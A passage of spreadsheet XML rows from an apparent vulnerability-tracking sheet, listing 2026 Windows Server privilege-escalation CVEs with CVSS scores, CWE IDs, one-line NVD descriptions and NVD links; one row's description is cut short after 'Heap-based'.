      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr"/>
      <c r="Q146" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69475</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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47" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr"/>
      <c r="Q147" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr"/>
      <c r="Q148" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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49" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr"/>
      <c r="Q149" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69532</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr"/>
      <c r="Q150" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr"/>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69580</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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2" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr"/>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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3" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr"/>
      <c r="Q153" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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4" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr"/>
      <c r="Q154" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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5" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr"/>
      <c r="Q155" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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56" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr"/>
      <c r="Q156" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr"/>
      <c r="Q157" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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8" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr"/>
      <c r="Q158" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69709</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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59" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr"/>
      <c r="Q159" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69738</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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0" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr"/>
      <c r="Q160" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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1" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr"/>
      <c r="Q161" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr"/>
      <c r="Q162" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr"/>
      <c r="Q163" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr"/>
      <c r="Q164" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="165">
